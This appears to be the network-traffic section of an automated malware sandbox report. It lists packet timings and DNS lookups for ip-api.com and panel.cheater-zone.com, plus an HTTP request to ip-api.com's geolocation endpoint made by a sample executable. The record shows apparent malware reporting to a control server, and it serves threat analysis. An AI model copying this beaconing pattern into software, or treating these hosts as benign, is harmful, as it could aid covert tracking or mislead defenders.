                                                                                                                                        Jan 23, 2023 21:25:53.439368963 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.439404964 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.439671993 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.439733028 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.495387077 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.495423079 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.495472908 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.538635015 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.563227892 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.563256025 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.563400984 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.563596010 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.563637018 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:54.040550947 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:54.145442009 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:55.929179907 CET4971080192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:55.961136103 CET8049710208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:55.961246014 CET4971080192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:56.018418074 CET4971780192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:56.048764944 CET8049717208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:56.048871040 CET4971780192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:56.050263882 CET4971780192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:56.080812931 CET8049717208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:56.145765066 CET4971780192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:57.387721062 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:57.387804985 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:58.564861059 CET4971780192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:59.052732944 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:59.137691021 CET4971880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:59.183409929 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:59.270956039 CET804971892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:59.271110058 CET4971880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:59.271301031 CET4971880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:59.404380083 CET804971892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:59.408112049 CET804971892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:59.536535978 CET4971880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:02.522527933 CET4971880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:02.668401003 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:02.697349072 CET804971892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:02.699944019 CET804971892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:02.700057030 CET4971880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:02.799278975 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:02.799462080 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:02.805896997 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:02.936820984 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:02.986946106 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:03.101003885 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:03.231977940 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:03.266861916 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:03.364993095 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:03.381027937 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:03.553019047 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:03.612912893 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:03.661928892 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:03.725219011 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:03.856223106 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:03.948374987 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.057018042 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:04.188324928 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.291939974 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.365072966 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:04.396956921 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:04.528601885 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.575546980 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.661962986 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:04.678045034 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:04.808942080 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.855988979 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:04.896370888 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:04.959621906 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.090670109 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.140971899 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.193288088 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.256362915 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.387257099 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.430114985 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.474524021 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.537333012 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.668495893 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.709048033 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.755804062 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.818567991 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:05.949310064 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:05.990093946 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.037095070 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:06.100217104 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:06.231101036 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.271626949 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.318346024 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:06.381253004 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:06.512105942 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.606432915 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.662164927 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:06.725090027 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:06.855942965 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.893277884 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:06.943470955 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.007277966 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.179003000 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:07.224912882 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.288518906 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.458165884 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:07.506027937 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.623275995 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.794948101 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:07.795058966 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:07.849853992 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:07.903924942 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:08.035625935 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:08.130971909 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:08.177998066 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:08.278064966 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:08.409079075 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:08.447007895 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:08.490474939 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:09.027549982 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:09.198916912 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:09.280329943 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:09.334249973 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:09.440654993 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:09.571595907 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:09.610276937 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:09.662420988 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:10.163378954 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:10.334822893 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:10.390861034 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:10.443763971 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:10.546200037 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:10.677018881 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:10.717154980 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:10.821436882 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:10.952554941 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:10.988811016 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.053216934 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:11.100404978 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:11.272105932 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.339256048 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.444247007 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:11.575208902 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.613493919 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.725845098 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:11.898135900 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.905600071 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:11.959491014 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.007060051 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.138587952 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:12.273540020 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:12.318914890 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.386657953 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.518362045 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:12.557701111 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:12.600192070 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.663096905 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.834980965 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:12.837805033 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:12.881553888 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:12.944468975 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:13.096570015 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:13.206904888 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:13.256539106 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:13.319804907 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:13.450817108 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:13.550713062 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:13.600188017 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:13.663201094 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:26:13.814194918 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:13.849142075 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:13.902194977 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:17.876439095 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:17.878200054 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:18.160805941 CET4971980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:18.161077023 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:18.291805029 CET804971992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:18.299676895 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:18.299858093 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:18.300055981 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:18.438504934 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:18.484451056 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:18.527627945 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:18.590637922 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:18.729768991 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:18.768790007 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:18.808926105 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:18.873500109 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:19.052223921 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:19.103596926 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:19.161968946 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:19.342257977 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:19.405400038 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:19.464734077 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:19.525784016 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:19.664330006 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:19.703243017 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:19.745522022 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:19.804735899 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:19.985024929 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:20.042505026 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:20.085437059 CET4972080192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:27:23.387419939 CET804972092.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:27:23.387533903 CET4972080192.168.2.392.249.45.113
                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Jan 23, 2023 21:24:58.871665001 CET6270453192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:24:58.893373966 CET53627048.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:08.443223953 CET4997753192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:08.463412046 CET53499778.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:11.535756111 CET5784053192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:11.553390980 CET53578408.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:22.189124107 CET5799053192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:22.208219051 CET53579908.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:22.825491905 CET5238753192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:22.844886065 CET53523878.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:23.090148926 CET5692453192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:23.128328085 CET53569248.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:33.646619081 CET6062553192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:33.684163094 CET53606258.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:34.280523062 CET4930253192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:34.299850941 CET53493028.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:36.890943050 CET5397553192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:36.920562029 CET53539758.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.142227888 CET5113953192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:39.166711092 CET5295553192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:39.178850889 CET53511398.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.184284925 CET53529558.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:47.714207888 CET5713453192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:47.731792927 CET53571348.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.110774994 CET6205053192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:52.128407955 CET53620508.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:55.984730005 CET5604253192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:56.016683102 CET53560428.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:59.081839085 CET5963653192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:25:59.136511087 CET53596368.8.8.8192.168.2.3
                                                                                                                                        Jan 23, 2023 21:26:02.552184105 CET5563853192.168.2.38.8.8.8
                                                                                                                                        Jan 23, 2023 21:26:02.666835070 CET53556388.8.8.8192.168.2.3
                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                        Jan 23, 2023 21:24:58.871665001 CET192.168.2.38.8.8.80x34f7Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:08.443223953 CET192.168.2.38.8.8.80xee26Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:11.535756111 CET192.168.2.38.8.8.80xf827Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:22.189124107 CET192.168.2.38.8.8.80x9eddStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:22.825491905 CET192.168.2.38.8.8.80x6d87Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:23.090148926 CET192.168.2.38.8.8.80x658Standard query (0)panel.cheater-zone.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:33.646619081 CET192.168.2.38.8.8.80xb7beStandard query (0)panel.cheater-zone.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:34.280523062 CET192.168.2.38.8.8.80xfffbStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:36.890943050 CET192.168.2.38.8.8.80xe259Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:39.142227888 CET192.168.2.38.8.8.80x76baStandard query (0)panel.cheater-zone.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:39.166711092 CET192.168.2.38.8.8.80xe3adStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:47.714207888 CET192.168.2.38.8.8.80x8220Standard query (0)panel.cheater-zone.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:52.110774994 CET192.168.2.38.8.8.80x1186Standard query (0)panel.cheater-zone.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:55.984730005 CET192.168.2.38.8.8.80x3130Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:59.081839085 CET192.168.2.38.8.8.80xb2c1Standard query (0)panel.cheater-zone.comA (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:26:02.552184105 CET192.168.2.38.8.8.80xb2baStandard query (0)panel.cheater-zone.comA (IP address)IN (0x0001)false
                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                        Jan 23, 2023 21:24:58.893373966 CET8.8.8.8192.168.2.30x34f7No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:08.463412046 CET8.8.8.8192.168.2.30xee26No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:11.553390980 CET8.8.8.8192.168.2.30xf827No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:22.208219051 CET8.8.8.8192.168.2.30x9eddNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:22.844886065 CET8.8.8.8192.168.2.30x6d87No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:23.128328085 CET8.8.8.8192.168.2.30x658No error (0)panel.cheater-zone.com92.249.45.113A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:33.684163094 CET8.8.8.8192.168.2.30xb7beNo error (0)panel.cheater-zone.com92.249.45.113A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:34.299850941 CET8.8.8.8192.168.2.30xfffbNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:36.920562029 CET8.8.8.8192.168.2.30xe259No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:39.178850889 CET8.8.8.8192.168.2.30x76baNo error (0)panel.cheater-zone.com92.249.45.113A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:39.184284925 CET8.8.8.8192.168.2.30xe3adNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:47.731792927 CET8.8.8.8192.168.2.30x8220No error (0)panel.cheater-zone.com92.249.45.113A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:52.128407955 CET8.8.8.8192.168.2.30x1186No error (0)panel.cheater-zone.com92.249.45.113A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:56.016683102 CET8.8.8.8192.168.2.30x3130No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:25:59.136511087 CET8.8.8.8192.168.2.30xb2c1No error (0)panel.cheater-zone.com92.249.45.113A (IP address)IN (0x0001)false
                                                                                                                                        Jan 23, 2023 21:26:02.666835070 CET8.8.8.8192.168.2.30xb2baNo error (0)panel.cheater-zone.com92.249.45.113A (IP address)IN (0x0001)false
                                                                                                                                        • ip-api.com
                                                                                                                                        • panel.cheater-zone.com
                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        0192.168.2.349702208.95.112.180C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:24:58.945521116 CET103OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Jan 23, 2023 21:24:58.979034901 CET104INHTTP/1.1 200 OK
                                                                                                                                        Date: Mon, 23 Jan 2023 20:24:58 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 293
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 60
                                                                                                                                        X-Rl: 44
